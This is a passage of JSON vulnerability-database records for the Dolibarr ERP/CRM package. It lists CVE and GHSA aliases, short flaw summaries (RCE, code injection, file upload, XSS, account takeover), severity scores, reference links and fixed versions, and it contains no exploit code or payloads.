"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2018-16808","GHSA-r3r5-fqfm-9wrh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3spa-q7qf-suez"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/13554?format=json","vulnerability_id":"VCID-3tfr-z5d3-hfhf","summary":"Dolibarr ERP CRM vulnerable to remote code execution (RCE)\nDolibarr ERP CRM before 19.0.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-40137","reference_id":"","reference_type":"","scores":[{"value":"0.0048","scoring_system":"epss","scoring_elements":"0.65354","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-40137"},{"reference_url":"https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-25T16:09:38Z/"}],"url":"https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-40137","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-40137"},{"reference_url":"https://github.com/advisories/GHSA-vprp-94p9-5jp8","reference_id":"GHSA-vprp-94p9-5jp8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vprp-94p9-5jp8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/38106?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-40137","GHSA-vprp-94p9-5jp8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3tfr-z5d3-hfhf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/51599?format=json","vulnerability_id":"VCID-3uay-6w6g-yfaw","summary":"Code injection in dolibarr/dolibarr\nImproper php function sanitization, lead to an ability to inject arbitrary PHP code and run arbitrary commands on file system. In the function \"dol_eval\" in file \"dolibarr/htdocs/core/lib/functions.lib.php\" dangerous PHP functions are sanitized using \"str_replace\" and can be bypassed using following code in $s parameter","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0819","reference_id":"","reference_type":"","scores":[{"value":"0.01735","scoring_system":"epss","scoring_elements":"0.82781","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0819"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075"},{"reference_url":"https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0819","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0819"},{"reference_url":"https://github.com/advisories/GHSA-42qm-c3cf-9wv2","reference_id":"GHSA-42qm-c3cf-9wv2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-42qm-c3cf-9wv2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/87920?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.1"}],"aliases":["CVE-2022-0819","GHSA-42qm-c3cf-9wv2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3uay-6w6g-yfaw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35746?format=json","vulnerability_id":"VCID-44xf-5xjn-juas","summary":"Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script\nAn issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38886","reference_id":"","reference_type":"","scores":[{"value":"0.50447","scoring_system":"epss","scoring_elements":"0.97888","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38886"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38886","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38886"},{"reference_url":"https://github.com/advisories/GHSA-6773-rfjv-c54w","reference_id":"GHSA-6773-rfjv-c54w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6773-rfjv-c54w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67967?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38886","GHSA-6773-rfjv-c54w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-44xf-5xjn-juas"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/62198?format=json","vulnerability_id":"VCID-4925-ueg7-63dy","summary":"Dolibarr Unrestricted Upload of File with Dangerous Type\nDolibarr before 11.0.5 allows low-privilege users to upload files of dangerous types, leading to arbitrary code execution. This occurs because .pht and .phar files can be uploaded. Also, a .htaccess file can be uploaded to reconfigure access control (e.g., to let .noexe files be executed as PHP code to defeat the .noexe protection mechanism).","references":[{"reference_url":"http://packetstormsecurity.com/files/161955/Dolibarr-ERP-CRM-11.0.4-Bypass-Code-Execution.html","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/161955/Dolibarr-ERP-CRM-11.0.4-Bypass-Code-Execution.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14209","reference_id":"","reference_type":"","scores":[{"value":"0.10166","scoring_system":"epss","scoring_elements":"0.93235","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14209"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/11.0.5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/11.0.5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14209","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14209"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-012","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-012"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/49711.py","reference_id":"CVE-2020-14209","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/49711.py"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/100581?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14209","GHSA-2gcp-xwxg-hqg3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4925-ueg7-63dy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/27543?format=json","vulnerability_id":"VCID-5vtj-mm9d-ukbf","summary":"Dolibarr vulnerable to RCE via the computed field parameter\nDolibarr ERP & CRM v21.0.1 were discovered to contain a remote code execution (RCE) vulnerability in the User module configuration via the computed field parameter.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-56588","reference_id":"","reference_type":"","scores":[{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44362","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-56588"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86"},{"reference_url":"https://github.com/PhDg1410/Research","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/"}],"url":"https://github.com/PhDg1410/Research"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-56588","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-56588"},{"reference_url":"https://github.com/advisories/GHSA-27hj-48r9-x2vx","reference_id":"GHSA-27hj-48r9-x2vx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-27hj-48r9-x2vx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/61313?format=json","purl":"pkg:composer/dolibarr/dolibarr@21.0.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@21.0.3"}],"aliases":["CVE-2025-56588","GHSA-27hj-48r9-x2vx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5vtj-mm9d-ukbf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14106?format=json","vulnerability_id":"VCID-5w7u-vtjw-fbck","summary":"Reflected Cross-Site Scripting (XSS) in Dolibarr\nA Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"0.00966","scoring_system":"epss","scoring_elements":"0.76861","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34051"},{"reference_url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34051"},{"reference_url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/","reference_id":"2024-004-cve-2024-34051","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-20T15:43:14Z/"}],"url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/"},{"reference_url":"https://github.com/advisories/GHSA-hv2j-6654-x74q","reference_id":"GHSA-hv2j-6654-x74q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hv2j-6654-x74q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/38106?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-34051","GHSA-hv2j-6654-x74q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5w7u-vtjw-fbck"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38139?format=json","vulnerability_id":"VCID-6fbp-syak-2qgu","summary":"Dolibarr Improper Input Validation vulnerability\nImproper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4197","reference_id":"","reference_type":"","scores":[{"value":"0.53316","scoring_system":"epss","scoring_elements":"0.98023","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4197"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4197","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4197"},{"reference_url":"https://starlabs.sg/advisories/23/23-4197","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/"}],"url":"https://starlabs.sg/advisories/23/23-4197"},{"reference_url":"https://github.com/advisories/GHSA-r9cm-pw9j-3fpx","reference_id":"GHSA-r9cm-pw9j-3fpx","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-r9cm-pw9j-3fpx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71137?format=json","purl":"pkg:composer/dolibarr/dolibarr@18.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.2"}],"aliases":["CVE-2023-4197","GHSA-r9cm-pw9j-3fpx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6fbp-syak-2qgu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42288?format=json","vulnerability_id":"VCID-6j9z-c2a6-xyhn","summary":"Weak Password Recovery Mechanism for Forgotten Password\nIn “Dolibarr” application, v2.8.1 to v13.0.2 are vulnerable to account takeover via password reset functionality. A low privileged attacker can reset the password of any user in the application using the password reset link the user received through email when requested for a forgotten 